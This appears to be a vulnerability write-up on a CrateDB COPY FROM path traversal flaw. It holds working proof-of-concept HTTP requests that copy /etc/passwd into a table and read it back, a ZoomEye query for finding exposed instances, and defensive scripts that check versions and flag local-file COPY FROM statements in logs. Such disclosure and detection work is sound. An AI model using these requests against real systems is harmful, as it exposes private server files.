0x00 Preface

This test is for learning purposes only; any illegal use has nothing to do with this platform or the publisher, and you bear the responsibility yourself!

0x01 Vulnerability introduction

CrateDB is a distributed, scalable SQL database developed by the company CrateDB.

CrateDB versions before 5.3.9, before 5.4.8, before 5.5.4 and before 5.6.1 contain a path traversal vulnerability. The flaw lies in the COPY FROM statement: an attacker can use COPY FROM to import the contents of arbitrary files readable by the database node into a table, which leads to information disclosure.

0x02 Affected versions

io.crate:crate < 5.3.9
5.4.0 <= io.crate:crate < 5.4.8
5.5.0 <= io.crate:crate < 5.5.4
5.6.0 <= io.crate:crate < 5.6.1
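A quick way to answer "is my deployment affected?" is to encode the four ranges above (lower bound inclusive, upper bound exclusive) and compare a version string against them. The following is an added example written for this post, not code from the CrateDB project; the log/inventory format it reads versions from is assumed to be a plain version string such as the one reported by the node.

```python
"""Check a CrateDB version against the affected ranges listed in this post.

Added example (not CrateDB project code). Ranges are transcribed from the
"Affected versions" section: lower bound inclusive, upper bound exclusive.
"""
from __future__ import annotations

import re

# (lower_bound_inclusive, upper_bound_exclusive); None = no lower bound.
AFFECTED_RANGES: list[tuple[str | None, str]] = [
    (None, "5.3.9"),
    ("5.4.0", "5.4.8"),
    ("5.5.0", "5.5.4"),
    ("5.6.0", "5.6.1"),
]


def parse_version(version: str) -> tuple[int, int, int]:
    """Turn '5.4.7' (optionally with a suffix such as '-SNAPSHOT') into (5, 4, 7).

    Missing components are padded with 0 so that '5.4' compares as 5.4.0.
    """
    match = re.match(r"^\s*(\d+(?:\.\d+)*)", version)
    if not match:
        raise ValueError(f"unparseable version: {version!r}")
    parts = [int(x) for x in match.group(1).split(".")]
    parts += [0] * (3 - len(parts))
    return (parts[0], parts[1], parts[2])


def first_fixed_version(version: str) -> str | None:
    """Return the first fixed release for an affected version, or None if unaffected.

    For an affected version the upper bound of its range is exactly the
    release that carries the fix, so that is what we return.
    """
    v = parse_version(version)
    for lower, upper in AFFECTED_RANGES:
        lower_ok = lower is None or parse_version(lower) <= v
        if lower_ok and v < parse_version(upper):
            return upper
    return None


def is_affected(version: str) -> bool:
    """True if the version falls inside any affected range."""
    return first_fixed_version(version) is not None


if __name__ == "__main__":
    # Constructed inventory of node versions, not real hosts.
    for node_version in ["5.2.10", "5.4.7", "5.4.8", "5.6.0", "5.6.1", "5.7.0"]:
        fix = first_fixed_version(node_version)
        status = f"AFFECTED, upgrade to {fix}" if fix else "not affected"
        print(f"{node_version:>8}: {status}")
```

Note that the tuple comparison treats 4.x releases as affected too (they sit below 5.3.9 with no lower bound), which matches the post's first range; confirm against the vendor advisory linked in section 0x04 if you run releases that old.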

0x03 Vulnerability reproduction

ZoomEye search syntax

app:"CrateDB"

1. Access the vulnerable environment


2. Reproduce the vulnerability

POC (POST)

Create the table

POST /_sql?types HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Content-Length: 52
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip
Connection: close

{"stmt":"CREATE TABLE hixwxdyt(info_leak STRING)"}

Copy the file into the table

POST /_sql?types HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Content-Length: 79
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip
Connection: close

{"stmt":"COPY hixwxdyt FROM '/etc/passwd' with (format='csv', header=false)"}

Read /etc/passwd (vulnerability confirmed)

POST /_sql?types HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Content-Length: 44
Access-Control-Allow-Origin: *
Connection: keep-alive
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip
Connection: close

{"stmt":"SELECT * FROM hixwxdyt limit 10"}
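The three requests above are the pattern a defender should look for: a COPY ... FROM whose source is a path on the node's local filesystem (a bare absolute path or a file:// URI) rather than a remote object store. The script below scans request logs of the HTTP /_sql endpoint for such statements. It is an added example written for this post, not a CrateDB or nuclei component; the log line layout (timestamp, client IP, method, path, JSON body) is constructed for the example and will need adjusting to whatever your reverse proxy or audit log actually emits.

```python
"""Flag COPY FROM statements that read the node's local filesystem.

Added example (not CrateDB project code). Scans constructed /_sql request
log lines and reports statements whose COPY source is a local path or
file:// URI, which is the access pattern used in the reproduction above.
"""
from __future__ import annotations

import json
import re
from urllib.parse import urlparse

# Matches: COPY <table> FROM '<uri>' ... (case-insensitive); the table may be
# schema-qualified or double-quoted.
COPY_FROM_RE = re.compile(
    r"""\bCOPY\s+(?P<table>[\w".]+)\s+FROM\s+'(?P<uri>[^']+)'""",
    re.IGNORECASE,
)

# URI schemes that resolve on the database node itself. An empty scheme means
# a bare filesystem path such as '/etc/passwd'.
LOCAL_SCHEMES = {"", "file"}

# Constructed sample log: "<timestamp> <client ip> <method> <path> <json body>".
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 POST /_sql {"stmt":"CREATE TABLE t1(info_leak STRING)"}
2024-05-01T10:00:02Z 10.0.0.5 POST /_sql {"stmt":"COPY t1 FROM '/etc/passwd' with (format='csv', header=false)"}
2024-05-01T10:00:03Z 10.0.0.5 POST /_sql {"stmt":"SELECT * FROM t1 limit 10"}
2024-05-01T10:01:00Z 10.0.0.9 POST /_sql {"stmt":"COPY quotes FROM 's3://example-bucket/quotes/*.json'"}
2024-05-01T10:02:00Z 10.0.0.9 POST /_sql {"stmt":"copy quotes from 'file:///etc/shadow'"}
2024-05-01T10:03:00Z 10.0.0.9 POST /_sql this is not json
"""


def local_uri(uri: str) -> bool:
    """True if the COPY source would be read from the node's own filesystem."""
    return urlparse(uri).scheme.lower() in LOCAL_SCHEMES


def find_local_copy_from(log_text: str) -> list[dict[str, str]]:
    """Return one finding per log line whose statement copies from a local path."""
    findings: list[dict[str, str]] = []
    for line in log_text.splitlines():
        # maxsplit=4 keeps the JSON body (which contains spaces) in one piece.
        parts = line.split(" ", 4)
        if len(parts) < 5:
            continue
        ts, client, _method, _path, body = parts
        try:
            stmt = json.loads(body).get("stmt", "")
        except (json.JSONDecodeError, AttributeError):
            continue  # malformed or non-object body: nothing to inspect
        match = COPY_FROM_RE.search(stmt)
        if match and local_uri(match.group("uri")):
            findings.append(
                {
                    "time": ts,
                    "client": client,
                    "table": match.group("table"),
                    "uri": match.group("uri"),
                }
            )
    return findings


if __name__ == "__main__":
    for f in find_local_copy_from(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} COPY {f['table']} FROM {f['uri']}")
```

Alerting on every local-filesystem COPY FROM is usually acceptable because legitimate ingestion normally comes from object storage or a known import directory; if your deployment does import from a local path, allowlist that prefix in `local_uri` rather than dropping the check. The s3:// line in the sample stays silent for exactly that reason.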

3. Test with the nuclei tool (vulnerability confirmed)


0x04 Remediation

The vendor has released fixed releases for this vulnerability; the advisory and patch details are available at:

https://github.com/crate/crate/security/advisories/GHSA-475g-vj6c-xf96